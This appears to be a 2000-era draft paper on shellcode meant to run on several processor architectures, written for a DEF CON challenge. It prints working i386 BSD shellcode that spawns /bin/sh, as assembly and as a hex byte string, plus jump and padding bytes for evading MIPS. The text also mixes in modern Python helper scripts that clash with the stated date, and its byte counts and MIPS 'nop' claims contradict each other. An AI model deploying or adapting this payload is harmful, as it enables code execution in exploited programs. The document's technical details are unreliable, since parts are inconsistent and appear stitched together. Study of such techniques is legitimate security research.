Architecture spanning shellcode
	by eugene@subterrain.net	09/05/2000

[rough draft. send all the comments to eugene@subterrain.net]

Content:
	Introduction
	Intel architecture
	MIPS architecture
	Sparc architecture
	Putting it all together
	Credits
	References
	To Do list



Introduction:

  At the defcon8 caezar's challenge 4 party a problem was presented: write
shellcode that will run on two or more processor platforms. Below you will
find my solution (don't forget to check the credits section).

  The general idea behind architecture spanning shellcode is to come up
with a sequence of bytes that executes a jump instruction on one
architecture while executing a NOP-like instruction on another architecture.
That way we branch to our shellcode on one architecture and fall through
to a different shellcode on the other architecture.

  Here is an ASCII representation of our bit stream:

XXX
arch1 shellcode
arch2 shellcode

where XXX is a sequence of bytes that branches to arch2's shellcode on
arch2 and falls through to arch1's shellcode on arch1.

In our case arch1 is going to be a MIPS platform and arch2 an Intel platform.

Due to certain intricacies (explained later) our bit stream is going to look
like
[XXX: this is probably going to go away]

XXX
YYY
arch2 shellcode
arch1 shellcode

where XXX is the Intel jump / MIPS nop instruction and YYY is a MIPS short jump
instruction that jumps over the Intel shellcode to the MIPS shellcode.
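
To make the layout concrete, here is a small Python sketch that computes where
each piece starts. The sizes are assumptions taken from the later sections of
this paper (an 8 byte XXX block, a 4 byte MIPS jump, a 56 byte Intel
shellcode), and the names layout and PARTS are mine, not part of any tool.

```python
def layout(parts):
    """Return {name: (offset, size)} for parts laid out back to back."""
    offsets = {}
    pos = 0
    for name, size in parts:
        offsets[name] = (pos, size)
        pos += size
    return offsets


# Sizes are assumptions taken from the later sections of this paper.
PARTS = [
    ("XXX intel jmp + pad", 8),  # 5 byte jmp + 3 pad bytes = 2 MIPS words
    ("YYY mips jump", 4),        # one 32 bit MIPS instruction
    ("intel shellcode", 56),     # arch2, size of the hex dump given later
]

if __name__ == "__main__":
    for name, (off, size) in layout(PARTS).items():
        print(f"{off:3d}  {name} ({size} bytes)")
```

With these sizes the Intel shellcode starts at offset 12, which is where the
Intel jump has to land, and the MIPS shellcode would start right after it.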

[XXX: do more research on this.. can be avoided if we perform a longer jump
thus still allowing for the MIPS opcode to be 0]
[XXX: do more research on short intel jumps.. how big is the short intel
jmp instruction? the jmp i am using right now is 5 bytes long which is
obviously a long jump]
[XXX: branch delay slots! need working code in order to test those.
 can get complicated.. give some theory behind CPU optimizations]





Intel architecture:

$ uname -ms
OpenBSD i386			// openbsd.. the only way to fly

$ cat jmp.asm			// a simple example of a relative jump
				// instruction. using this example + gdb
				// we can figure out the hex and binary
				// equiv of our instruction
section .text
global  _start

_syscall:
        int     0x80
        ret

_start:
        mov     eax, 2
        jmp     $+0xA		; relative jump! jump to a push instruction
				; thus bypassing mov eax, 3 instruction
        mov     eax, 3
        push    eax
        mov     eax, 1          ; sys_exit
        call    _syscall

$ nasm -f aoutb jmp.asm		// this is how we compile & link our nasm code
$ ld -e _start -o jmp jmp.o
$ ./jmp
$ echo $?
2				// notice that the return code is 2 and not 3!
				// that means that our jmp $+0xA worked.
				// the jmp instruction jumped over 'mov eax, 3'
				// instruction
$ gdb -q jmp
(no debugging symbols found)...(gdb) disassemble start
Dump of assembler code for function start:
0x1023 <start>:         movl   $0x2,%eax
0x1028 <start+5>:       jmp    0x1032
0x102d <start+10>:      movl   $0x3,%eax
0x1032 <start+15>:      pushl  %eax
0x1033 <start+16>:      movl   $0x1,%eax
0x1038 <start+21>:      call   0x1020
0x103d <start+26>:      nop
0x103e <start+27>:      nop
0x103f <start+28>:      nop
End of assembler dump.
(gdb) x/5bx start+5			// our jump instruction.
					// 0xe9 is the opcode. the remaining
					// four bytes are the little-endian
					// offset, counted from the end of the
					// 5 byte instruction: 0xA - 5 = 5
0x1028 <start+5>:       0xe9    0x05    0x00    0x00    0x00
(gdb) x/t start+5
0x1028 <start+5>:       11101001	// binary for 0xe9. will need that later
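
The offset arithmetic above can be checked with a few lines of Python. This is
only a sketch of the 5 byte 0xe9 encoding seen in the gdb dump; the function
names are made up for this example.

```python
import struct


def encode_jmp_rel32(insn_addr, target_addr):
    """Encode an i386 near jump (opcode 0xe9) located at insn_addr."""
    # The displacement is relative to the end of the 5 byte instruction.
    disp = target_addr - (insn_addr + 5)
    return b"\xe9" + struct.pack("<i", disp)


def decode_jmp_rel32(insn_addr, raw):
    """Return the target address of a 5 byte 0xe9 jump at insn_addr."""
    if len(raw) != 5 or raw[0] != 0xE9:
        raise ValueError("not a 5 byte 0xe9 jump")
    (disp,) = struct.unpack("<i", raw[1:])
    return insn_addr + 5 + disp


if __name__ == "__main__":
    raw = encode_jmp_rel32(0x1028, 0x1032)      # the jmp $+0xA from jmp.asm
    print(" ".join(f"{b:02x}" for b in raw))
    print(hex(decode_jmp_rel32(0x1028, raw)))
```

The same helper gives e9 07 00 00 00 for a jump from offset 0 to offset 12,
which is the jmp $+12 used in the MIPS section.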


39 bytes intel shellcode by yours truly (with some feedback from bind). To
learn more about writing shellcode check out Aleph One's article on
buffer overflows in Phrack 49 (see the References section).


__asm__("
        jmp     0x21                    # 0x21 = 33 bytes forward, to the call
        popl    %esi

        pushl   $0

        movl    %esi, 8(%esi)           # ptr to ptr to /bin/sh
        leal    8(%esi), %eax
        pushl   %eax

        movl    %esi, %eax              # ptr to /bin/sh
        pushl   %eax

        movl    $0x3b, %eax
        pushl   $0
        int     $0x80

        pushl   $5
        pushl   $0
        movl    $1, %eax
        int     $0x80

        call    -0x26                   # 0x26 = 38 bytes back, to the popl
#       .string \"/bin/sh\"
        .byte   0x2f
        .byte   0x62
        .byte   0x69
        .byte   0x6e
        .byte   0x2f
        .byte   0x73
        .byte   0x68
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
");

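The two displacements in the listing (jmp 0x21 and call -0x26) are easy to get
wrong when instructions are added or removed, so here is a Python sketch that
checks them against the assembled bytes. The bytes are copied from the hex
dump in the "Putting it all together" section; the helper names are mine. It
only reads the bytes, it does not run them.

```python
import struct

# Bytes copied from the hex dump in the "Putting it all together" section.
CODE = bytes.fromhex(
    "eb215e6a008976088d46085089f0"
    "50b83b0000006a00cd806a056a00b801"
    "000000cd80e8daffffff2f62696e"
    "2f7368" + "00" * 9
)


def short_jmp_target(code, off):
    """Target offset of a 2 byte jmp (0xeb rel8) found at offset off."""
    if code[off] != 0xEB:
        raise ValueError("no 0xeb jmp at this offset")
    (disp,) = struct.unpack("b", code[off + 1:off + 2])
    return off + 2 + disp


def call_target(code, off):
    """Target offset of a 5 byte call (0xe8 rel32) found at offset off."""
    if code[off] != 0xE8:
        raise ValueError("no 0xe8 call at this offset")
    (disp,) = struct.unpack("<i", code[off + 1:off + 5])
    return off + 5 + disp


if __name__ == "__main__":
    call_off = short_jmp_target(CODE, 0)      # where the first jmp lands
    pop_off = call_target(CODE, call_off)     # where the call lands
    print("jmp lands at", call_off, "opcode", hex(CODE[call_off]))
    print("call lands at", pop_off, "opcode", hex(CODE[pop_off]))
    print("string after the call:", CODE[call_off + 5:call_off + 12])
```

The jmp should land on the call (0xe8) and the call should land on the popl
(0x5e), with the /bin/sh string sitting right behind the call.
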




MIPS architecture:

The nice thing about MIPS assembly is that each MIPS instruction is exactly
32 bits long.

In our case, the first Intel instruction (jmp) is 5 bytes long, thus we pad the
5 byte Intel instruction with another 3 bytes to create a total of 2 MIPS
instructions.

the first Intel instruction (jmp $+12) looks like (the offset is 12 - 5 = 7)
0xe9    0x07    0x00    0x00	0x00

converting it to binary gives us

11101001 00000111 00000000 00000000 00000000

we are going to ignore the last byte for now as it is going to become
the first byte of the next MIPS instruction.
also we shouldn't forget that the MIPS boxes we care about (SGI) are
big-endian while Intel is little-endian. a big-endian processor treats the
first byte in memory as the most significant byte of the instruction word,
so MIPS fetches the first four bytes as the word 0xe9070000.

In order to make sense out of the above binary stream we have to understand
how a MIPS processor is going to interpret it. [XXX: add more comments
regarding MIPS instruction formats]

MIPS R-type instruction format:

opcode (6 bits)  rs (5 bits)  rt (5 bits)  rd (5 bits)  shamt (5 bits) funct
									(6 bits)

111010 01000 00111 00000 00000   000000
(op)   (rs)  (rt)  (rd)  (shamt) (funct)

An opcode of 0 represents a variety of arithmetic instructions, and for those
we need to look at the funct field in order to figure out which instruction is
going to be executed. A MIPS reference indicates that an opcode of 0 and a
funct of 0 represent a shift left instruction (sll). With a shift amount
(shamt) of 0 it changes none of the registers, which is good enough for a nop.
The word above does not fit that pattern: its opcode is 111010 (0x3a), which
the MIPS opcode map assigns to swc2 (store word from coprocessor 2), not to an
arithmetic instruction. So the 0xe9 byte still has to be dealt with before
this word can serve as a MIPS nop.

next MIPS instruction looks like:
   
0x00	0x00    0x00    0x00

32 bits of 0's is a MIPS nop instruction (MIPS nop instruction is "represented
by sll $0, $0, 0, which shifts the register 0 left 0 places. it does nothing
to register 0, which can't be changed in any case, and hence is used as a nop
by MIPS software")
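
Splitting words into fields by hand is error prone, so here is a Python sketch
that does it. It assumes a big-endian MIPS that fetches the bytes in memory
order and simply applies the 6/5/5/5/5/6 R-type split to every word, whether
or not the word really is an R-type instruction. The function name and the
STREAM constant are made up for this example.

```python
import struct


def mips_fields(raw4):
    """Split 4 bytes, fetched big-endian, into the MIPS R-type fields."""
    (word,) = struct.unpack(">I", raw4)
    return {
        "opcode": word >> 26,          # top 6 bits
        "rs": (word >> 21) & 0x1F,
        "rt": (word >> 16) & 0x1F,
        "rd": (word >> 11) & 0x1F,
        "shamt": (word >> 6) & 0x1F,
        "funct": word & 0x3F,          # low 6 bits
    }


# The 5 byte Intel jmp followed by 3 pad bytes: two MIPS words.
STREAM = bytes([0xE9, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])

if __name__ == "__main__":
    for off in (0, 4):
        word = STREAM[off:off + 4]
        fields = mips_fields(word)
        print(" ".join(f"{b:08b}" for b in word), fields)
```

A word is the canonical nop only when every field comes out as 0. For the
second word that is the case; for the first word the opcode field comes out
as 58 (0x3a).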



the shellcode itself is incomplete..  need an account on a MIPS box
(i.e. an SGI box)
if you can provide me with an account for a short amount of time that would
be great!





Sparc architecture:

Just as is the case with the MIPS architecture, Sparc instructions are
always 32 bits long. The Sparc architecture is also big-endian, thus the same
bytes are fetched as the same two 32 bit words..
our 2 Sparc instructions are going to look like

0xe9    0x07    0x00    0x00	0x00
11101001 00000111 00000000 00000000 00000000

and

00000000000000....

Sparc uses the top 2 bits of the word as the op field. The all 0's word has an
op of 0, which belongs to the SETHI & Branches (Bicc, FBfcc, CBccc) group. The
first word starts with 11, an op of 3, which is the load/store group.
[XXX: decode the rest of the instruction. make sure it does what we want (nop)]
[XXX: the challenge at this point is to have a MIPS jump be a nop in Sparc
assembly.. or the other way around.. thus our bit stream now looks like

XXX		- intel jump
YYY		- mips jump
ZZZ		- sparc jump.. might not need that in case we make sparc
		  shellcode to follow the YYY jump
arch1
arch2
arch3

fun ;-)
]
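
As a first step towards decoding the Sparc side, here is a Python sketch that
classifies a word by its op field and, for op 0, by its op2 field. It assumes
the SPARC V8 instruction formats (op in the top 2 bits, op2 in bits 24..22);
the tables and the function name are mine and only cover what is needed here.

```python
import struct

# op field (top 2 bits) -> instruction group, assuming SPARC V8.
OP_GROUPS = {
    0: "format 2: SETHI & branches",
    1: "format 1: CALL",
    2: "format 3: arithmetic, logical, shift, other",
    3: "format 3: load/store",
}

# op2 field (bits 24..22), only meaningful when op == 0.
OP2_NAMES = {0: "UNIMP", 2: "Bicc", 4: "SETHI", 6: "FBfcc", 7: "CBccc"}


def sparc_classify(raw4):
    """Return (group, op2 name or None) for 4 bytes fetched big-endian."""
    (word,) = struct.unpack(">I", raw4)
    op = word >> 30
    if op == 0:
        op2 = (word >> 22) & 0x7
        return OP_GROUPS[op], OP2_NAMES.get(op2, "reserved")
    return OP_GROUPS[op], None


if __name__ == "__main__":
    print(sparc_classify(bytes([0xE9, 0x07, 0x00, 0x00])))
    print(sparc_classify(bytes(4)))
```

Neither word is obviously a nop under this split (the canonical Sparc nop is
sethi 0, %g0, which needs op2 = 4), so the XXX above still stands.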





Putting it all together.. Architecture spanning shellcode:


0xe9    0x07    0x00    0x00    0x00	; jmp $+12 (intel)
0x00	0x00	0x00			; pad. with the 0x00 above: a MIPS nop

(MIPS 4 byte jump to MIPS shellcode)

intel shellcode:

\xeb\x21\x5e\x6a\x00\x89\x76\x08\x8d\x46\x08\x50\x89\xf0
\x50\xb8\x3b\x00\x00\x00\x6a\x00\xcd\x80\x6a\x05\x6a\x00\xb8\x01
\x00\x00\x00\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e
\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00

(MIPS shellcode)






Credits:

Greg Hoglund for coming up with the original idea at the challenge party
prole & harm for coming up with the idea way before Greg :)
SSG, ghettohackers





References:


prole & harm's paper on the subject (way more extensive than mine)
	not released yet.

the challenge
	www.caezarschallenge.org

Aleph One's article on buffer overflows in Phrack 49
	("Smashing The Stack For Fun And Profit").





To Do List:

add more architectures (at least sparc, maybe hp and powerpc)

[XXX: like MIPS, powerpc uses fixed 32 bit instructions, but the encodings
	are different, so it needs its own decoding]

[XXX: do more research on shellcode that will run on both bsd & linux..
	bsd passes the parameters to syscalls on stack while linux uses
	registers for that..

$ cat linuxbsdasm.asm
section .text
global  _start

_syscall:
        int     0x80
        ret

_start:
        mov     ebx, 13		; place the exit code in a register (for linux)
        push    ebx		; and push it on stack (for bsd)
        mov     eax, 1          ; sys_exit (common call for both OSes)
        call    _syscall        ; exit(13)

$ nasm -f aoutb linuxbsdasm.asm && ld -e _start -o linuxbsdasm linuxbsdasm.o
$ ./linuxbsdasm
$ echo $?
13
$ uname -ms
OpenBSD i386
$ ssh -l eugene linuxbox
[eugene@linuxbox]$ nasm -f elf linuxbsdasm.asm && ld -s -o linuxbsdasm linuxbsdasm.o
[eugene@linuxbox]$ ./linuxbsdasm
[eugene@linuxbox]$ echo $?
13
[eugene@linuxbox]$ uname -ms
Linux i686
]